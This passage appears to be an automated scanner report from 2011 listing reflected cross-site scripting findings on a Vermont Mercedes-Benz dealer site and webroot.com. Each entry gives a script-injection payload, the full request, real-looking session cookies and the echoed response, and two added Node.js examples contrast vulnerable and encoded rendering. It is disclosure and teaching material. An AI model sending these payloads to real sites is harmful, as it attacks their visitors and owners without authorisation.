mg src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=5fa27'-alert(document.cookie)-'bad3f5b4489&amp;20=www.theautomastermercedesbenz.com&amp;21=/linkoutc6bc8"><script>alert(1)</script>504fe4ad92d/index.htm&amp;50=5f47f9aa0a0a002f005f07e845da2017&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=1
...[SNIP]...

4.194. http://www.theautomastermercedesbenz.com/linkout/index.htm [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /linkout/index.htm

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6ea4'%3balert(1)//ee04aa6c904 was submitted in the url parameter. This input was echoed as f6ea4';alert(1)//ee04aa6c904 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /linkout/index.htm?url=http://www.dealer.comf6ea4'%3balert(1)//ee04aa6c904 HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973377.1; __utmc=124194511; __utmb=124194511.26.9.1302973849681

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:10:39 GMT
Connection: close
Content-Length: 18132

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
<![CDATA[*/
           
   jQuery(function () {
       $('#linkOutLink').click(function () {
           var onTrack = function () { document.location.href = 'http://www.dealer.comf6ea4';alert(1)//ee04aa6c904'; };

           $(this).unbind('click').html('<span>
...[SNIP]...

4.195. http://www.theautomastermercedesbenz.com/new-inventory/index.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /new-inventory/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6623"><script>alert(1)</script>fdaaeb1000e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-inventorya6623"><script>alert(1)</script>fdaaeb1000e/index.htm?reset=InventoryListing HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/financing/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=5f439ee10a0a002f005f07e8e85727f2; JSESSIONID=cywj1cs5gwvm; ddcpoolid=CmsPoolO; __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; __utma=124194511.1620789493.1302973377.1302973377.1302973377.1; __utmc=124194511; __utmb=124194511.10.3.1302973397616

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14282
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:08:08 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://theautomaster.com/index.htm&amp;20=www.theautomastermercedesbenz.com&amp;21=/new-inventorya6623"><script>alert(1)</script>fdaaeb1000e/index.htm&amp;50=5f439ee10a0a002f005f07e8e85727f2&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=1
...[SNIP]...

4.196. http://www.theautomastermercedesbenz.com/specials/finance.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /specials/finance.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84e55"><script>alert(1)</script>ddb4d93f836 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /specials84e55"><script>alert(1)</script>ddb4d93f836/finance.htm HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/used-inventory/index.htm?SByear=clear&SBmake=Mercedes-Benz&SBmodel=clear&SBbodystyle=clear&SBprice=clear
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973629.1302976747.3; __utmc=124194511; __utmb=124194511.3.7.1302979441461

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14369
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 18:46:44 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
g src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=5fa27'-alert(document.cookie)-'bad3f5b4489&amp;20=www.theautomastermercedesbenz.com&amp;21=/specials84e55"><script>alert(1)</script>ddb4d93f836/finance.htm&amp;50=5f47f9aa0a0a002f005f07e845da2017&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0
...[SNIP]...

4.197. http://www.theautomastermercedesbenz.com/used-inventory/index.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /used-inventory/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98fbd"><script>alert(1)</script>ad12aacef3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used-inventory98fbd"><script>alert(1)</script>ad12aacef3c/index.htm?SByear=clear&SBmake=Mercedes-Benz&SBmodel=clear&SBbodystyle=clear&SBprice=clear HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/used-inventory/index.htm?reset=InventoryListing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973629.2; __utmc=124194511; __utmb=124194511.19.8.1302976741563

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14373
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 18:01:18 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
"http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=5fa27'-alert(document.cookie)-'bad3f5b4489&amp;20=www.theautomastermercedesbenz.com&amp;21=/used-inventory98fbd"><script>alert(1)</script>ad12aacef3c/index.htm&amp;50=5f47f9aa0a0a002f005f07e845da2017&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=1
...[SNIP]...

4.198. http://www.theautomastermercedesbenz.com/used-inventory/index.htm [SBbodystyle parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /used-inventory/index.htm

Issue detail

The value of the SBbodystyle request parameter is copied into the HTML document as plain text between tags. The payload ae6b1<script>alert(1)</script>43130dd7918 was submitted in the SBbodystyle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used-inventory/index.htm?SByear=clear&SBmake=Mercedes-Benz&SBmodel=clear&SBbodystyle=clearae6b1<script>alert(1)</script>43130dd7918&SBprice=clear HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/used-inventory/index.htm?reset=InventoryListing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973629.2; __utmc=124194511; __utmb=124194511.19.8.1302976741563

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:59:17 GMT
Connection: close
Cache-Control: no-store
Content-Length: 37157

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Used Inventory for Mercedes Benz in Shelburne VT 05482 that includes used cars trucks and
...[SNIP]...
<div>
                                                           
                                               
       Sorry, no Mercedes-Benz clearae6b1<script>alert(1)</script>43130dd7918 Certified vehicles are currently in stock.    
       
                                   &nbsp;To search for other vehicles, please use the Narrow Search bar above.                
                           <br />
...[SNIP]...
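Added example, not code from the XSS.CX report or from the dealer sites it lists: a small Node.js fragment reproducing the reflection context described in this finding (untrusted parameter values concatenated into HTML text between tags) beside a hardened renderer, together with the canary check behind the phrase "echoed unmodified". The scanner wraps its payload in random hex markers, then searches the response for those markers to see whether the bytes between them came back intact. The page template, function names and parameter values below are constructed for the example; only the markers and payload are taken from the finding above.

```javascript
// Added example: not code from the XSS.CX report or from the dealer sites it lists.
// Reproduces the "between tags" reflection from the SBbodystyle/SBmake/SBmodel findings
// and the canary check a scanner uses to decide that input was "echoed unmodified".
// The page fragment, parameter values and function names are constructed for illustration.

// Encoder for HTML text placed between tags (the three characters that matter there).
function encodeHtmlText(s) {
  return String(s).replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Vulnerable rendering: query parameters concatenated straight into the response body.
function renderVulnerable(params) {
  return '<div>Sorry, no ' + params.SBmake + ' ' + params.SBbodystyle +
         ' Certified vehicles are currently in stock.</div>';
}

// Hardened rendering: every untrusted value is encoded for the text context it lands in.
function renderSafe(params) {
  return '<div>Sorry, no ' + encodeHtmlText(params.SBmake) + ' ' +
         encodeHtmlText(params.SBbodystyle) + ' Certified vehicles are currently in stock.</div>';
}

// Scanner-style classification of a reflection. The payload is wrapped in random hex
// markers so it cannot collide with page content (markers must be [0-9a-f]+ here, since
// they are used unescaped in a RegExp). Returns:
//   'unmodified' - the exact payload sits between the markers (exploitable as-is)
//   'encoded'    - the markers are back but the payload between them was altered
//   'absent'     - the markers never appear in the body
function classifyReflection(body, prefix, payload, suffix) {
  const m = body.match(new RegExp(prefix + '([\\s\\S]*?)' + suffix));
  if (!m) return 'absent';
  return m[1] === payload ? 'unmodified' : 'encoded';
}

// Same markers and payload as the SBbodystyle finding above.
const prefix = 'ae6b1';
const suffix = '43130dd7918';
const payload = '<script>alert(1)</script>';
const params = { SBmake: 'Mercedes-Benz', SBbodystyle: 'clear' + prefix + payload + suffix };

const vulnerableBody = renderVulnerable(params);
const safeBody = renderSafe(params);

console.log('vulnerable:', classifyReflection(vulnerableBody, prefix, payload, suffix)); // unmodified
console.log('hardened:  ', classifyReflection(safeBody, prefix, payload, suffix));      // encoded
```

The three-way result mirrors what a scanner reports as reflected and exploitable, reflected but neutralised, or not reflected. An "encoded" result is still worth recording: the parameter does reach the response, and a different context or payload may get through where this one did not.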

4.199. http://www.theautomastermercedesbenz.com/used-inventory/index.htm [SBmake parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /used-inventory/index.htm

Issue detail

The value of the SBmake request parameter is copied into the HTML document as plain text between tags. The payload 5c1f3<script>alert(1)</script>161a7b5aa82 was submitted in the SBmake parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used-inventory/index.htm?SByear=clear&SBmake=Mercedes-Benz5c1f3<script>alert(1)</script>161a7b5aa82&SBmodel=clear&SBbodystyle=clear&SBprice=clear HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/used-inventory/index.htm?reset=InventoryListing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973629.2; __utmc=124194511; __utmb=124194511.19.8.1302976741563

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:59:07 GMT
Connection: close
Cache-Control: no-store
Content-Length: 37181

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Used Inventory for Mercedes Benz in Shelburne VT 05482 that includes used cars trucks and
...[SNIP]...
<div>
                                                           
                                               
       Sorry, no Mercedes-Benz5c1f3<script>alert(1)</script>161a7b5aa82 Certified vehicles are currently in stock.    
       
                                   &nbsp;To search for other vehicles, please use the Narrow Search bar above.                
                           <br />
...[SNIP]...

4.200. http://www.theautomastermercedesbenz.com/used-inventory/index.htm [SBmodel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /used-inventory/index.htm

Issue detail

The value of the SBmodel request parameter is copied into the HTML document as plain text between tags. The payload e5131<script>alert(1)</script>a0d520f6586 was submitted in the SBmodel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used-inventory/index.htm?SByear=clear&SBmake=Mercedes-Benz&SBmodel=cleare5131<script>alert(1)</script>a0d520f6586&SBbodystyle=clear&SBprice=clear HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/used-inventory/index.htm?reset=InventoryListing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973629.2; __utmc=124194511; __utmb=124194511.19.8.1302976741563

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:59:12 GMT
Connection: close
Cache-Control: no-store
Content-Length: 37186

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Used Inventory for Mercedes Benz in Shelburne VT 05482 that includes used cars trucks and
...[SNIP]...
<div>
                                                           
                                               
       Sorry, no Mercedes-Benz cleare5131<script>alert(1)</script>a0d520f6586 Certified vehicles are currently in stock.    
       
                                   &nbsp;To search for other vehicles, please use the Narrow Search bar above.                
                           <br />
...[SNIP]...

4.201. http://www.webroot.com/En_US/business-antispyware-ce-with-antivirus.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/business-antispyware-ce-with-antivirus.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a611a"-alert(1)-"edea93188f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/business-antispyware-ce-with-antivirus.html?a611a"-alert(1)-"edea93188f=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:11:47 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 48857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<he
...[SNIP]...
<script type="text/javascript">
   //bold which ever page this is
   $("#rightRailLinks ul li a[href='/En_US/business-antispyware-ce-with-antivirus.html?a611a"-alert(1)-"edea93188f=1']").css("font-weight", "bold");
</script>
...[SNIP]...
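Added example, not code from the XSS.CX report or from webroot.com, showing in Node.js why a payload of the form `"-alert(1)-"` executes when it is reflected into a double-quoted JavaScript string, and what the server-side rendering has to do instead. It models the pattern visible in the response above: the current request URI is written into a `<script>` block so that client-side jQuery can bold the matching menu link. The template, function names and sample URI are constructed for the example; the payload URI is the one from this finding.

```javascript
// Added example: not code from the XSS.CX report or from webroot.com.
// Models the pattern visible in the response above: the server writes the current request
// URI into a double-quoted JavaScript string so that client-side jQuery can bold the
// matching menu link. Template, function names and the sample URI are constructed here.

// Vulnerable: the raw URI (path plus attacker-controlled query string) is concatenated
// into a JS string literal, so a double quote in the URI ends the literal early.
function renderScriptVulnerable(requestUri) {
  return '$("#rightRailLinks ul li a[href=\'' + requestUri +
         '\']").css("font-weight", "bold");';
}

// Encoder for the JS string-literal context. JSON.stringify escapes quotes, backslashes and
// control characters; the extra replacements keep "</script>" from closing the script block
// and escape U+2028/U+2029, which JSON leaves raw but JavaScript treats as line terminators.
function jsStringLiteral(s) {
  return JSON.stringify(String(s))
    .replace(/</g, '\\u003c').replace(/>/g, '\\u003e').replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028').replace(/\u2029/g, '\\u2029');
}

// Hardened: the URI is emitted as a complete string literal and concatenated at runtime,
// so nothing in it can terminate the literal or the <script> element.
function renderScriptSafe(requestUri) {
  return '$("#rightRailLinks ul li a[href=\'" + ' + jsStringLiteral(requestUri) +
         ' + "\']").css("font-weight", "bold");';
}

// Runs a rendered script against stub jQuery and alert() and reports how many times
// alert() fired. This is a test harness for the two renderers only; evaluating page
// content like this is never appropriate in production code.
function runWithStubs(script) {
  let alerts = 0;
  const $ = () => ({ css() { return this; } });
  const alert = () => { alerts += 1; };
  new Function('$', 'alert', script)($, alert);
  return alerts;
}

// Request URI from the finding above: the parameter *name* carries the payload.
const payloadUri =
  '/En_US/business-antispyware-ce-with-antivirus.html?a611a"-alert(1)-"edea93188f=1';
const vulnerableScript = renderScriptVulnerable(payloadUri);
const safeScript = renderScriptSafe(payloadUri);

console.log(vulnerableScript);
console.log('alert() calls, vulnerable:', runWithStubs(vulnerableScript)); // 1
console.log(safeScript);
console.log('alert() calls, hardened:  ', runWithStubs(safeScript));      // 0
```

In the vulnerable output the selector string becomes `"...?a611a" - alert(1) - "edea93188f=1"`, a valid expression whose evaluation calls `alert(1)`; no `<script>` tag and no HTML breakout are needed, which is why an HTML-only encoder would not have stopped it. Encoding for the JS string context fixes the injection, but the page still has no reason to reflect the URI at all: a static script that compares `location.pathname` against each link's `href` achieves the same bolding with no untrusted data in the script block, and also avoids a stray single quote in the URI turning the jQuery selector into a syntax error.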

4.202. http://www.webroot.com/En_US/business-antispyware-ce.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/business-antispyware-ce.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbd72"-alert(1)-"8a0c6be8998 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/business-antispyware-ce.html?cbd72"-alert(1)-"8a0c6be8998=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1303045247220; WRSID=53806c0679aadc2e5c9ced35171f7aa7; __utmz=43535610.1303044931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; RCID=P_RC%3D%3E99999%3AP_AC%3D%3E%3AP_RSC%3D%3E; mbox=session#1303044923199-20205#1303047100|PC#1303044923199-20205.17#1318856440|check#true#1303045300; s_vnum=1305636930736%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1303045247_PCT-1303045247_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_vi=[CS]v1|26D571A185013486-400001026021711E[CE]; s_nr=1303045247207; __utma=43535610.2084358374.1303044931.1303044931.1303044931.1; __utmc=43535610; __utmb=43535610.2.10.1303044931;

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:09:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 46800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<he
...[SNIP]...
<script type="text/javascript">
   //bold which ever page this is
   $("#rightRailLinks ul li a[href='/En_US/business-antispyware-ce.html?cbd72"-alert(1)-"8a0c6be8998=1']").css("font-weight", "bold");
</script>
...[SNIP]...

4.203. http://www.webroot.com/En_US/business-events-and-webinars-archives.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webroot.com
Path:   /En_US/business-events-and-webinars-archives.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19b23"-alert(1)-"08b2f515f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /En_US/business-events-and-webinars-archives.html?19b23"-alert(1)-"08b2f515f3=1 HTTP/1.1
Host: www.webroot.com
Accept: */*
Accept-Language: en
